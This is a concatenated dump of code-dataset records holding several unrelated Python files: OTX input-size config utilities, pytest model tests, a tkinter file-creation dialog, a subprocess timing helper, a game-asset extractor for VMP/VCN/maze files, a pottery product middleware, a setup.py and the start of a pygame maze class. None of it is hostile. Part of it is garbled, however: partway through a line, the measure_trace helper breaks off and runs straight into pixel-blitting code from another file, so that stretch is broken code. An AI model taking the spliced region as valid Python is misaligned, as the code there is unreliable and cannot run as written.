pipeline:\n continue\n size_val = pipeline[pipeline_attr]\n if isinstance(size_val, int):\n return [size_val, size_val]\n elif isinstance(size_val, tuple):\n return list(size_val)\n elif isinstance(size_val, list):\n return list(size_val[0])\n\n return None\n\n def _get_pipelines(self, subset_type: str):\n if \"pipeline\" in self._data_config[subset_type]:\n return self._data_config[subset_type][\"pipeline\"]\n if \"dataset\" in self._data_config[subset_type]:\n return self._data_config[subset_type][\"dataset\"][\"pipeline\"]\n raise RuntimeError(\"Failed to find pipeline.\")\n\n def _set_pipeline_size_value(self, pipeline: Dict, scale: Tuple[Union[int, float], Union[int, float]]):\n updated = False\n for pipeline_name, pipeline_attrs in self.PIPELINE_TO_CHANGE.items():\n if pipeline_name in pipeline[\"type\"].lower():\n for pipeline_attr in pipeline_attrs:\n if pipeline_attr in pipeline:\n self._set_size_value(pipeline, pipeline_attr, scale)\n updated = True\n if updated:\n break\n\n for pipeline_name, sub_pipeline_names in self.PIPELINE_WRAPPER.items():\n if pipeline_name == pipeline[\"type\"]:\n for sub_pipeline_name in sub_pipeline_names:\n if sub_pipeline_name in pipeline:\n if isinstance(pipeline[sub_pipeline_name], dict):\n self._set_pipeline_size_value(pipeline[sub_pipeline_name], scale)\n elif isinstance(pipeline[sub_pipeline_name][0], dict):\n for sub_pipeline in pipeline[sub_pipeline_name]:\n self._set_pipeline_size_value(sub_pipeline, scale)\n elif isinstance(pipeline[sub_pipeline_name][0], list):\n for sub_pipelines in pipeline[sub_pipeline_name]:\n for sub_pipeline in sub_pipelines:\n self._set_pipeline_size_value(sub_pipeline, scale)\n else:\n raise ValueError(\n \"Dataset pipeline in pipeline wrapper type should be\"\n \"either dict, list[dict] or list[list[dict]].\"\n )\n\n @staticmethod\n def _set_size_value(pipeline: Dict, attr: str, scale: Tuple[Union[int, float], Union[int, float]]):\n if isinstance(pipeline[attr], int):\n pipeline[attr] = round(pipeline[attr] * scale[0])\n elif isinstance(pipeline[attr], list) and isinstance(pipeline[attr][0], tuple):\n for idx in range(len(pipeline[attr])):\n pipeline[attr][idx] = (\n round(pipeline[attr][idx][0] * scale[0]),\n round(pipeline[attr][idx][1] * scale[1]),\n )\n else:\n pipeline[attr] = (round(pipeline[attr][0] * scale[0]), round(pipeline[attr][1] * scale[1]))\n\n\ndef get_configured_input_size(\n input_size_config: InputSizePreset = InputSizePreset.DEFAULT, model_ckpt: Optional[str] = None\n) -> Union[None, Tuple[int, int]]:\n \"\"\"Get configurable input size configuration. If it doesn't exist, return None.\n\n Args:\n input_size_config (InputSizePreset, optional): Input size configuration. Defaults to InputSizePreset.DEFAULT.\n model_ckpt (Optional[str], optional): Model weight to load. Defaults to None.\n\n Returns:\n Union[None, Tuple[int, int]]: Pair of width and height. If there is no input size configuration, return None.\n \"\"\"\n input_size = None\n if input_size_config == InputSizePreset.DEFAULT:\n if model_ckpt is None:\n return None\n\n model_info = torch.load(model_ckpt, map_location=\"cpu\")\n for key in [\"config\", \"learning_parameters\", \"input_size\", \"value\"]:\n if key not in model_info:\n return None\n model_info = model_info[key]\n input_size = model_info\n\n if input_size == InputSizePreset.DEFAULT.value:\n return None\n\n logger.info(\"Given model weight was trained with {} input size.\".format(input_size))\n else:\n input_size = input_size_config.value\n\n parsed_tocken = re.match(\"(\\\\d+)x(\\\\d+)\", input_size)\n return (int(parsed_tocken.group(1)), int(parsed_tocken.group(2)))\n","sub_path":"src/otx/algorithms/common/adapters/mmcv/utils/config_utils.py","file_name":"config_utils.py","file_ext":"py","file_size_in_byte":38489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"67971495","text":"from datetime import date\n\nimport pytest\n\nfrom app import create_app, db\nfrom app.models import Movie, Actor, ValidationError\n\n\n@pytest.fixture(autouse=True)\ndef init_test_db():\n app = create_app('testing')\n with app.app_context():\n db.create_all()\n yield\n db.drop_all()\n\n\ndef test_movie_model():\n first_movie = Movie(title='TITLE1', release_date=date(2020, 1, 1))\n first_movie.save()\n second_movie = Movie(title='TITLE2', release_date=date(2020, 1, 2))\n second_movie.save()\n\n saved_movies = Movie.query.all()\n assert len(saved_movies) == 2\n\n first_saved_movie = Movie.query.get(1)\n assert first_saved_movie.title == 'TITLE1'\n assert first_saved_movie.release_date == date(2020, 1, 1)\n\n second_saved_movie = Movie.query.get(2)\n assert second_saved_movie.title == 'TITLE2'\n assert second_saved_movie.release_date == date(2020, 1, 2)\n\n first_saved_movie.remove()\n assert Movie.query.get(1) is None\n\n\ndef test_movie_to_dict():\n movie = Movie(title='TITLE', release_date=date(2020, 1, 1))\n assert movie.to_dict() == {\n 'id': None,\n 'title': 'TITLE',\n 'release_date': '2020-01-01',\n }\n\n\ndef test_actor_model():\n first_actor = Actor(name='ACTOR1', age=10, gender='F')\n first_actor.save()\n second_actor = Actor(name='ACTOR2', age=20, gender='M')\n second_actor.save()\n\n saved_actors = Actor.query.all()\n assert len(saved_actors) == 2\n\n first_saved_actor = Actor.query.get(1)\n assert first_saved_actor.name == 'ACTOR1'\n assert first_saved_actor.age == 10\n assert first_saved_actor.gender == 'F'\n\n second_saved_actor = Actor.query.get(2)\n assert second_saved_actor.name == 'ACTOR2'\n assert second_saved_actor.age == 20\n assert second_saved_actor.gender == 'M'\n\n first_saved_actor.remove()\n assert Actor.query.get(1) is None\n\n\ndef test_actor_non_negative_age():\n with pytest.raises(ValidationError, match='Age is negative'):\n Actor(age=-1)\n\n\ndef test_actor_to_dict():\n actor = Actor(name='Actor', age=10, gender='F')\n assert actor.to_dict() == {\n 'id': None,\n 'name': 'Actor',\n 'age': 10,\n 'gender': 'F'\n }\n","sub_path":"tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"524806095","text":"#!/usr/bin/env python3\r\n\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nimport action\r\nimport Controller\r\n\r\n'''\r\nHandles Create window\r\n'''\r\n\r\nclass Frame(ttk.Frame):\r\n def __init__(self, parent):\r\n ttk.Frame.__init__(self, parent, padding=\"10 10 10 10\")\r\n self.parent = parent\r\n #print(parent)\r\n \r\n # Define string variables for text entry fields\r\n self.name = tk.StringVar()\r\n\r\n self.initComponents()\r\n\r\n def initComponents(self):\r\n self.pack()\r\n\r\n # Display the grid of labels and text entry fields\r\n ttk.Label(self, text=\"File Name (no extension):\").grid(\r\n column=0, row=0, sticky=tk.E)\r\n ttk.Entry(self, width=25, textvariable=self.name).grid(\r\n column=1, row=0)\r\n\r\n\r\n\r\n\r\n self.makeButtons()\r\n\r\n for child in self.winfo_children():\r\n child.grid_configure(padx=5, pady=3)\r\n\r\n def makeButtons(self):\r\n # Create a frame to store the two buttons\r\n buttonFrame = ttk.Frame(self)\r\n\r\n # Add the button frame to the bottom row of the main grid\r\n buttonFrame.grid(column=0, row=4, columnspan=2, sticky=tk.E)\r\n\r\n # Add two buttons to the button frame\r\n ttk.Button(buttonFrame, text=\"Create\", command=self.create) \\\r\n .grid(column=0, row=0, padx=5)\r\n\r\n #ttk.Button(buttonFrame, text=\"About\", command=self.bt) \\\r\n # .grid(column=1, row=0, padx=5)\r\n\r\n ttk.Button(buttonFrame, text=\"Exit\", command=self.parent.destroy) \\\r\n .grid(column=2, row=0)\r\n\r\n def create(self):\r\n #a bit of a bodge, but it works with a \"loop\" to get round these if bugs\r\n s = \" \"\r\n for i in s:\r\n i = action.makeFile(self.name.get())\r\n if (i == 0):\r\n self.invalidChar()\r\n continue\r\n if (i == 1):\r\n self.Blank()\r\n continue\r\n if (i == 2):\r\n self.Reserved()\r\n continue\r\n if (i == 3):\r\n self.Taken()\r\n continue\r\n else:\r\n self.complete(self.name.get())\r\n\r\n def makeWindow(self):\r\n root = tk.Tk()\r\n root.title(\"Create File\")\r\n Frame(root)\r\n root.mainloop()\r\n \r\n \r\n def complete(self, s):\r\n msg = messagebox.showinfo(\"Complete\", \"A new file \\\"\" + s + \".txt\\\" has been created. Please add terms\")\r\n Controller.output(s)\r\n \r\n def Taken(self):\r\n msg = messagebox.showinfo(\"Taken\", \"File name is taken\")\r\n\r\n def Blank(self):\r\n msg = messagebox.showinfo(\"Blank\", \"File name is blank\")\r\n\r\n def Reserved(self):\r\n msg = messagebox.showinfo(\"Reserved\", \"The file name \\\"Files\\\" is reserved name. Please select another one.\")\r\n\r\n def invalidChar(self):\r\n msg = messagebox.showinfo(\"Invalid Character\", \"An invalid character has been included in the file name. \\n\\nPlease do not include the following: space, tab, return, ! @ # $ % ^ & * ( ) ~ ` ? > < / , . : ; { } [ ] | \\\" ' - \")\r\n \r\n#End of class\r\n\r\ndef main():\r\n root = tk.Tk()\r\n root.title(\"Create File\")\r\n Frame(root)\r\n root.mainloop()\r\n \r\n\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"Keybasket v 1_4/Keybasket_src/Create.py","file_name":"Create.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"340620348","text":"from statistics import mean\nimport random\n\ndist1_vals = []\ndist2_vals = []\nLOWER_BOUND = 0\nUPPER_BOUND = 999999\nMEAN = mean(range(LOWER_BOUND, UPPER_BOUND))\n\ndef main():\n\tfor i in range(0, 10000):\n\t\ta = random.randint(LOWER_BOUND, UPPER_BOUND)\n\t\tb = random.randint(LOWER_BOUND, UPPER_BOUND)\n\n\t\t# Getting first distance\n\t\tdist1 = abs(a - b)\t\n\t\tdist1_vals.append(dist1)\n\n\t\t# Getting second distance\n\t\tdist2 = abs(a - MEAN)\n\t\tdist2_vals.append(dist2)\n\n\t\tprint(dist1)\n\t\tprint(dist2)\n\t\t\n\tprint(\"Random distance average: \" + str(mean(dist1_vals)))\n\tprint(\"Mean distance average: \" + str(mean(dist2_vals)))\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"512474895","text":"import os\nimport sys\nimport subprocess\n\ndef measure_perf(cmd):\n # Run command\n out = subprocess.Popen(cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n\n # Get output\n stdout, _ = out.communicate()\n\n # Check if start of output is a number\n try:\n num = float(stdout.split(b';')[0])\n except ValueError:\n return -1\n\n # Get running time in ms\n return num\n\ndef measure_trace(cmd):\n # Run command\n out = subprocess.Popen(cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n\n # Get output\n stdout, _ = out.communicate()\n\n tokens = stdout.split(b'\\n')\n\n # Check if start of output is a number\n try:\n if not tokens[0].startswith(b'> 4\n col2 = word & 0x0f\n img_coords = block_y * pix_per_block_row + block_x * BLOCKS_SIZE + y * img_width + 2 * x\n img_data[img_coords] = col1\n img_data[img_coords + 1] = col2\n\n img.putdata(img_data)\n\"\"\"\n\n\nclass VmpAsset:\n class TilesInfo:\n def __init__(self):\n self.wall_type = None\n self.tiles = []\n\n def export(self):\n return {\n 'wallType': self.wall_type,\n 'tiles': [t.export() for t in self.tiles],\n }\n\n class Tile:\n def __init__(self, vcn_block, flipped):\n self.flipped = flipped\n self.vcn_block = vcn_block\n\n def export(self):\n return {\n 'vcn_block': self.vcn_block,\n 'flipped': self.flipped\n }\n\n def __init__(self):\n self.name = None\n self.bg_tiles = None\n self.wall_tiles = None\n self.exported = False\n self.vcn = None\n\n @staticmethod\n def load(basename, vmp_filename, vcn_filename, level_palette):\n with BinaryReader(vmp_filename) as reader:\n shorts_per_tileset = 431\n file_size = reader.read_ushort()\n num_wall_types = int(file_size / shorts_per_tileset) - 1\n\n # one short per block\n bg_tiles = reader.read_ushort(BLOCKS_COLUMNS * BLOCKS_ROWS)\n\n # padding\n wall_tiles = reader.read_ushort(101 + num_wall_types*shorts_per_tileset)\n\n vcn = VcnAsset.load(basename, vcn_filename, level_palette)\n vmp_asset = VmpAsset()\n vmp_asset.vcn = vcn\n vmp_asset.name = basename\n vmp_asset.bg_tiles = bg_tiles\n vmp_asset.wall_tiles = wall_tiles\n return vmp_asset\n\n def export(self, output_dir):\n\n if self.exported:\n return\n\n self.vcn.export(output_dir)\n\n wall_tiles_infos = self._export_vmp_blocks(self.wall_tiles)\n bg_tiles = self._export_vmp_blocks(self.bg_tiles)\n\n data = {\n 'name': self.name,\n 'bgTiles': [t.export() for t in bg_tiles],\n 'wallTiles': [t.export() for t in wall_tiles_infos]\n }\n\n vmp_filename = '%s.vmp.json' % self.name\n with open(os.path.join(output_dir, vmp_filename), 'w') as handle:\n json.dump(data, handle, indent=True, sort_keys=False)\n\n self.exported = True\n\n @staticmethod\n def _export_vmp_blocks(tileset):\n exported_blocks = []\n for tile_index in range(len(tileset)):\n tile = tileset[tile_index]\n flip = (tile & 0x04000) == 0x04000\n vcn_block_index = tile & 0x3fff\n\n exported_blocks.append(VmpAsset.Tile(vcn_block_index, flip))\n\n return exported_blocks\n\n\nclass AssetsManager:\n DATA_DIR = \"data/\"\n BUILD_DIR = \"build/\"\n\n def __init__(self, data_dir=DATA_DIR, build_dir=BUILD_DIR):\n self.images = {}\n self.decorations = {}\n self.texts = []\n self.mazes = {}\n self.vmps = {}\n\n self.id_gen = 0\n self.data_dir = data_dir\n self.build_dir = build_dir\n self.palette_filename = None\n self.palette = None\n\n def set_palette(self, palette_filename):\n palette_filename = os.path.join(self.data_dir, palette_filename.upper())\n\n if not palette_filename.endswith(PAL_EXTENSION): palette_filename += PAL_EXTENSION\n self.palette_filename = palette_filename\n self.palette = gfx.load_palette(self.palette_filename)\n\n def export_cps_image(self, cps_filename):\n\n if cps_filename in self.images:\n return\n\n rel_cps_filename = os.path.join(self.data_dir, cps_filename.upper())\n if not rel_cps_filename.endswith(CPS_EXTENSION): rel_cps_filename += CPS_EXTENSION\n\n img = gfx.load_cps(rel_cps_filename, self.palette)\n image_asset = self._export_image(img, cps_filename + '.png')\n image_asset.original_asset = rel_cps_filename\n\n return image_asset\n\n def export_dec_file(self, dec_assets_ref):\n\n dec_key = str(dec_assets_ref)\n if dec_key in self.decorations:\n return\n\n dec_asset = DecorationsAsset()\n dec_asset.original_assets = dec_assets_ref\n\n self.decorations[dec_key] = dec_asset\n\n with BinaryReader('data/{file}'.format(file=dec_assets_ref.get_dec_file())) as reader:\n count = reader.read_ushort()\n\n for i in range(count):\n deco = Decoration()\n deco.rectangle_indices = [-1 if value == 255 else value for value in reader.read_ubyte(10)]\n deco.next_decoration_index = reader.read_byte()\n deco.flags = reader.read_byte()\n deco.x_coords = reader.read_short(10)\n deco.y_coords = reader.read_short(10)\n\n dec_asset.append_decoration(deco)\n\n count = reader.read_ushort()\n for i in range(count):\n rect = list(reader.read_ushort(4))\n rect[0] *= 8\n rect[2] *= 8\n dec_asset.append_rectangle(ShapeRect(*rect))\n\n dec_exported_filename = os.path.join(self.build_dir, dec_assets_ref.get_dec_file())\n image_asset = self.export_cps_image(dec_assets_ref.get_gfx_file())\n\n dec_asset.filename = dec_exported_filename\n dec_asset.image_filename = image_asset.filename\n\n with open(dec_exported_filename, 'w') as handle:\n json.dump(dec_asset.export(), handle, indent=True, sort_keys=False)\n\n return dec_asset\n\n def export_texts(self):\n file = os.path.join(self.data_dir, 'TEXT.DAT')\n offsets = []\n with BinaryReader(file) as reader:\n while True:\n offset = reader.read_ushort()\n offsets.append(offset)\n if reader.offset >= offsets[0]:\n break\n\n for id, offset in enumerate(offsets):\n\n if id == len(offsets) - 1:\n length = os.path.getsize(file) - offsets[id]\n else:\n length = offsets[id + 1] - offsets[id]\n\n self.texts.append(reader.read_string(length))\n\n with open(os.path.join(self.build_dir, 'texts.json'), 'w') as handle:\n json.dump(self.texts, handle, indent=True, sort_keys=False)\n\n return self.texts\n\n def export_maze(self, maze_name):\n maze_filename = maze_name.upper()\n if not maze_filename.endswith(MAZ_EXTENSION):\n maze_filename += MAZ_EXTENSION\n\n with BinaryReader(os.path.join(self.data_dir, maze_filename)) as reader:\n\n width = reader.read_ushort()\n height = reader.read_ushort()\n faces = reader.read_ushort()\n\n walls = [[None for _ in range(height)] for _ in range(width)]\n\n for y in range(height):\n for x in range(width):\n n = reader.read_ubyte()\n e = reader.read_ubyte()\n s = reader.read_ubyte()\n w = reader.read_ubyte()\n\n walls[x][y] = {\n 'x': x,\n 'y': y,\n 'n': n,\n 's': s,\n 'w': w,\n 'e': e,\n }\n\n maze = Maze(maze_name, width, height, faces, walls)\n self.mazes[maze_name] = maze\n\n with open(os.path.join(self.build_dir, maze_name), 'w') as handle:\n json.dump(maze.__dict__, handle, indent=True, sort_keys=False)\n\n def load_dcr(self, name=''):\n\n filename = name.upper()\n if not filename.endswith(DCR_EXTENSION):\n filename += DCR_EXTENSION\n\n rel_filename = os.path.join(self.data_dir, filename)\n if not os.path.exists(rel_filename):\n return None\n\n with BinaryReader(rel_filename) as reader:\n count = reader.read_ushort()\n for i in range(count):\n dcr_asset = DcrAsset(name)\n\n sides = []\n for j in range(6):\n side = DcrAsset.SideData()\n side.cps_x = reader.read_ubyte() * 8\n side.cps_y = reader.read_ubyte()\n side.width = reader.read_ubyte() * 8\n side.height = reader.read_ubyte()\n side.screen_x = reader.read_ubyte()\n side.screen_y = reader.read_ubyte()\n\n sides.append(side)\n\n dcr_asset.sides = sides\n\n return dcr_asset\n\n def get_decorations(self, dec_assets_ref):\n return self.decorations[str(dec_assets_ref)]\n\n def get_image(self, cps_filename):\n return self.images[cps_filename]\n\n def get_text(self, i):\n return self.texts[i]\n\n def get_maze(self, maze_name):\n return self.mazes[maze_name]\n\n def export_items(self):\n items = [] # ITEM.DAT\n items_names = []\n\n with BinaryReader('data/ITEM.DAT') as reader:\n count = reader.read_ushort()\n for i in range(count):\n item = {\n 'unidentified_name': reader.read_ubyte(),\n 'identified_name': reader.read_ubyte(),\n 'flags': reader.read_ubyte(),\n 'picture': reader.read_ubyte(),\n 'type': reader.read_ubyte(), # See types below\n\n # Where the item lies at position\n # In Maze:\n # 0..3-> Bottom\n # 4..7-> Wall (N,E,S,W)\n # For EotB I: 0..3-> Floor NW,NE,SW,SE\n # 8-> Compartment\n # If in inventory:\n # 0..26-> Position in Inventory\n 'sub_position': reader.read_ubyte(),\n\n # Position in maze x + y * 32, consumed if <= 0\n 'coordinate': reader.read_ushort(),\n 'next': reader.read_ushort(),\n 'previous': reader.read_ushort(),\n\n # Level, where the item lies, 0 <= no level\n 'level': reader.read_ubyte(),\n\n # The value of item, -1 if consumed\n 'value': reader.read_byte(),\n }\n pos = divmod(item['coordinate'], 32)\n item['coordinate'] = {'x': pos[1], 'y': pos[0]}\n items.append(item)\n\n count = reader.read_ushort()\n for i in range(count):\n name = reader.read_string(35)\n items_names.append(name)\n\n for item in items:\n item['unidentified_name'] = items_names[item['unidentified_name']]\n item['identified_name'] = items_names[item['identified_name']]\n\n with open(os.path.join(self.build_dir, 'items.json'), 'w') as handle:\n json.dump(items, handle, indent=True, sort_keys=False)\n\n def export_item_types(self):\n item_types = []\n with BinaryReader(os.path.join(self.data_dir, 'ITEMTYPE.DAT')) as reader:\n count = reader.read_ushort()\n for i in range(count):\n item_type = {\n # At which position in inventory it is allowed to be put. See InventoryUsage\n 'slots': str(ItemSlotFlags(reader.read_ushort())),\n 'flags': str(ItemFlags(reader.read_ushort())),\n 'armor_class': reader.read_byte(), # Adds to armor class\n 'allowed_classes': str(ProfessionFlags(reader.read_ubyte())),\n # Allowed for this profession. See ClassUsage\n 'allowed_hands': str(HandFlags(reader.read_ubyte())), # Allowed for this hand\n 'damage_vs_small': str(Dice(reader)),\n 'damage_vs_big': str(Dice(reader)),\n # 'damage_incs': reader.read_ubyte(),\n 'unknown': reader.read_ubyte(),\n 'usage': str(ItemTypeUsage(reader.read_ushort())),\n }\n\n item_types.append(item_type)\n\n with open(os.path.join(self.build_dir, 'item_types.json'), 'w') as handle:\n json.dump(item_types, handle, indent=True, sort_keys=False)\n\n def load_vmp(self, vmp_name=''):\n\n if vmp_name in self.vmps:\n return self.vmps[vmp_name]\n\n vmp_filename = vmp_name.upper()\n if not vmp_filename.endswith(VMP_EXTENSION):\n vmp_filename += VMP_EXTENSION\n\n vmp_filename = os.path.join(self.data_dir, vmp_filename)\n if not os.path.exists(vmp_filename):\n raise Exception('Cannot find VMP file %s' % vmp_filename)\n\n vcn_filename = vmp_name.upper() + '.VCN'\n vcn_filename = os.path.join(self.data_dir, vcn_filename)\n if not os.path.exists(vcn_filename):\n raise Exception('Cannot find the VCN file %s' % vcn_filename)\n\n vmp_asset = VmpAsset.load(vmp_name, vmp_filename, vcn_filename, self.palette)\n self.vmps[vmp_name] = vmp_asset\n\n return vmp_asset\n\n def export_vmp(self, vmp_name):\n if vmp_name not in self.vmps:\n vmp = self.load_vmp(vmp_name)\n else:\n vmp = self.vmps[vmp_name]\n if vmp.exported:\n return vmp\n\n vmp.export(self.build_dir)\n vmp.exported = True\n return vmp\n\n \"\"\"\n def export_walls(self, wall_type, vmp):\n img_width = 24 * BLOCKS_SIZE\n img_height = 18 * BLOCKS_SIZE\n\n img = Image.new('P', (img_width, img_height))\n img.putpalette(vmp.vcn.walls_palette)\n\n img_data = [255 for _ in range(img_width * img_height)]\n\n for wall_pos in [22]:\n cfg = walls_render_config[wall_pos]\n offset = cfg.base_offset\n\n for y in range(cfg.blk_height):\n\n for x in range(2,4):#cfg.blk_width):\n\n if cfg.flip:\n block_index = cfg.view_offset + cfg.blk_width - (x + 1) + y * BLOCKS_COLUMNS\n else:\n block_index = x + y * BLOCKS_COLUMNS + cfg.view_offset\n\n block_x = block_index % BLOCKS_COLUMNS\n block_y = block_index // BLOCKS_COLUMNS\n\n tile = vmp.wall_tiles_infos[wall_type].tiles[offset]\n flip = tile.flipped ^ cfg.flip\n block = vmp.vcn.blocks[tile.vcn_block]\n\n self.blit_block(img_data, img_width, block_x * BLOCKS_SIZE, block_y * BLOCKS_SIZE, block, flip)\n\n offset += 1\n\n offset += cfg.skip\n\n img.putdata(img_data)\n self._export_image(img, f'walls_{vmp.name}_{wall_type}.png')\n\n\n \"\"\"\n\n @staticmethod\n def _export_vmp_blocks(tileset, num_tiles):\n exported_blocks = []\n for tile_index in range(num_tiles):\n tile = tileset[tile_index]\n flip = (tile & 0x04000) == 0x04000\n vcn_block_index = tile & 0x3fff\n\n exported_blocks.append(VmpAsset.Tile(vcn_block_index, flip))\n\n return exported_blocks\n\n def _export_image(self, pil_img, filename):\n exported_filename = os.path.join(self.build_dir, filename.lower())\n pil_img.convert('RGB').save(exported_filename)\n\n image_asset = ImageAsset(self.id_gen, exported_filename, full_path=os.path.abspath(exported_filename))\n\n self.images[filename] = image_asset\n self.id_gen += 1\n return image_asset\n\n\ndef blit_block(image_data, img_width, x, y, vcn_block, flip):\n s = -1 if flip else 1\n p = 7 if flip else 0\n\n for w in range(8):\n for v in range(4):\n word = vcn_block[v + w * 4]\n col1 = (word & 0xf0) >> 4\n col2 = word & 0x0f\n coords = x + p + s * 2 * v + (y + w) * img_width\n image_data[coords] = col1\n image_data[coords + s] = col2\n","sub_path":"assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":24090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"453637540","text":"from pottery.entities import products\nfrom pottery.resources.exceptions import PotteryException\nfrom pottery.converters import product_converter\nfrom pottery.resources.utils import to_dict\nimport pymongo\n\n\n# convert the product object which comes from product_catalog to product entity object(database object) and save.\nclass product_middleware:\n def create_product(self, product):\n try:\n if products.product_entity.objects.get({'_id': product.id}) != None:\n raise PotteryException(f'A1: Pottery item with the id {product.id} already exist')\n except Exception as e:\n if e.__class__.__name__ == 'PotterException':\n raise e\n elif e.__class__.__name__ =='DoesNotExist':\n pass\n else:\n raise Exception(\"Internal server error\")\n\n prod_data = products.product_entity(id=product.id, name=product.name, title=product.title,\n description=product.description, weight=product.weight,\n dimentions=product.dimentions, price=product.price,\n image=product.image).save()\n return self.get_product(product.id)\n\n def get_product(self, product_id):\n prod_data = products.product_entity.objects.get({'_id': product_id})\n return product_converter.product_entity_to_product(prod_data)\n\n def get_products(self,limit=10,marker=0):\n print(limit)\n print(marker)\n product_entities = products.product_entity.objects.order_by([('_id',pymongo.ASCENDING)]).skip(limit*marker).limit(limit)\n return product_converter.product_entities_to_products(product_entities)\n\n def delete_product(self, product_id):\n if products.product_entity.objects.get({'_id':product_id}) == None :\n raise PotteryException(f'A2: Pottery item with the id {product_id} Doesnt exist')\n prod_data = products.product_entity.objects.get({'_id': product_id}).delete()\n\n def update_product(self,product_id,product):\n gp = self.get_product(product_id)\n resp = to_dict(gp)\n if resp['id']!=product.id:\n raise PotteryException('Id missmatch')\n\n try:\n product_entity = products.product_entity.objects.get({'_id':product_id})\n product_entity.name = product.name\n product_entity.weight = product.weight\n product_entity.title=product.title\n product_entity.description=product.description\n product_entity.dimentions=product.dimentions\n product_entity.price=product.price\n product_entity.image=product.image\n product_entity.save()\n return self.get_product(product_id)\n except:\n raise PotteryException(f'A3: pottery ite with the id {product_id} Does not exist')\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pottery/middleware/product_orchestrator.py","file_name":"product_orchestrator.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"334479749","text":"import os\nimport sys\nfrom functools import reduce\nfrom os.path import join as opj\nfrom distutils.core import setup, Extension\nfrom Cython.Distutils import build_ext\nfrom DistUtilsExtra.command import build_i18n,build_help,build_icons,build_extra\n__package_name__ = 'gsrp5server'\n__package_file__ = 'gsrp5-server'\n\nmodules = []\n\npackage_data = {'gsrp5server':['*.rng','certs/*']}\n\ndata_files = [('/lib/systemd/system',[opj(__package_name__,'conf','gsrp5-server.service')]),('/etc/gsrp5-server.d',[opj(__package_name__,'conf','gsrp5-server.conf')])]\n\nfor lang in os.listdir(opj(__package_name__,'locale')):\n\tdata_files.append((os.path.join(sys.prefix,'share', 'locale', lang, 'LC_MESSAGES'),[opj(__package_name__,'locale', lang, 'LC_MESSAGES','gsrp5server.mo')]))\n\nfor d in os.walk('gsrp5server'):\n\tl = list(map(lambda x:x[:-2],list(filter(lambda x: x[0] != '.' and x[-2:]=='.c',d[2]))))\n\tif len(l) > 0:\n\t\ta=list(map(lambda x:opj(d[0],x), l ))\n\t\tfor n in a:\n\t\t\tmodules.append(Extension('%s' % (n.replace(os.path.sep,'.'),), sources = ['%s' % (n + '.c')],language='clang'))\nfor sd in ('root','addons'):\t\t\t\n\tfor d in os.walk(opj('gsrp5server',sd)):\n\t\tl = list(map(lambda x:x,list(filter(lambda x: x[-4:] in ('.xml','.csv','.pot','.rml') or x[-5:] in ('.yaml','.docx','.xlsx') or x[-3:] == '.po' or x == '__manifest__.info',d[2]))))\n\t\tif len(l) > 0:\n\t\t\ta=list(map(lambda x:opj(d[0],x), l ))\n\t\t\tfor n in a:\n\t\t\t\tdata_files.append((opj(sys.base_prefix,'lib64','python'+('%s.%s') % (sys.version_info.major,sys.version_info.minor),'site-packages',d[0]),[n]))\n\npackages = ['gsrp5server']\n\nsetup (name = __package_name__,package_data = package_data, data_files = data_files, scripts = [opj(__package_name__,'script/gsrp5-server')], packages = packages,package_dir = {__package_name__:'gsrp5server'},version = '1.0.1', description = 'Global System Resource Planing',long_description = 'Global System Resource Planing & Executing', author='Nikolay Chesnokov', author_email='nikolaychesnokov@gmail.com' , url='http://www.gsrp5.org', license='AGPL-3'\n,cmdclass = { 'build_ext': build_ext, \"build\" : build_extra.build_extra,'build_i18n':build_i18n.build_i18n}, ext_modules = modules)\n\n\n\n","sub_path":"server/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"529127036","text":"import pygame\nimport random\nimport solver\nr = random.randint\nimgSize = 32\nclass Maze():\n def __init__(self, nRows, nColumns, ecran, font):\n # loading the textures for the canvas\n self._water = [0] * 4\n self._magma = [0] * 4\n for i in range(4):\n self._water[i] = pygame.image.load(f\"img\\\\water\\\\water{i + 1}.png\")\n for i in range(4):\n self._magma[i] = pygame.image.load(f\"img\\\\magma\\\\magma{i + 1}.png\")\n self._start = pygame.image.load(\"img\\\\boat.png\")\n self._end = pygame.image.load(\"img\\\\chest.png\")\n self._enqueued = pygame.image.load(\"img\\\\actual.png\")\n self._visited = pygame.image.load(\"img\\\\vizitat.png\")\n # setting the starting and ending point to null\n self._startPoint = 0\n self._endPoint = 0\n\n self._ecran = ecran\n self._nRows = nRows\n self._nColumns = nColumns\n self._matrix = [0] * nRows\n for i in range(nRows):\n self._matrix[i] = [0] * nColumns\n self.initializeMatrix()\n self._font = font\n\n self._s = 0\n def borderMatrix(self):\n # creates the magma wall\n for i in range(self._nRows):\n self._matrix[i][0] = self._matrix[i][self._nColumns - 1] = 20 + r(1, 4)\n for i in range(self._nColumns):\n self._matrix[0][i] = self._matrix[self._nRows - 1][i] = 20 + r(1, 4)\n def initializeMatrix(self):\n # puts only water and magma wall, and reset the states of the class\n self._s = 0\n self._startPoint = self._endPoint = 0\n for i in range(self._nRows):\n for j in range(self._nColumns):\n self._matrix[i][j] = 10 + r(1, 4)\n self.borderMatrix()\n def showMatrix(self):\n # setting images on canvas\n if self._s != 0:\n distMatrix = self._s.getDistMatrix()\n for i in range(self._nRows):\n for j in range(self._nColumns):\n if self._matrix[i][j] // 10 == 0:\n if self._matrix[i][j] == 0:\n self._ecran.blit(self._visited, (i * imgSize, j * imgSize))\n elif 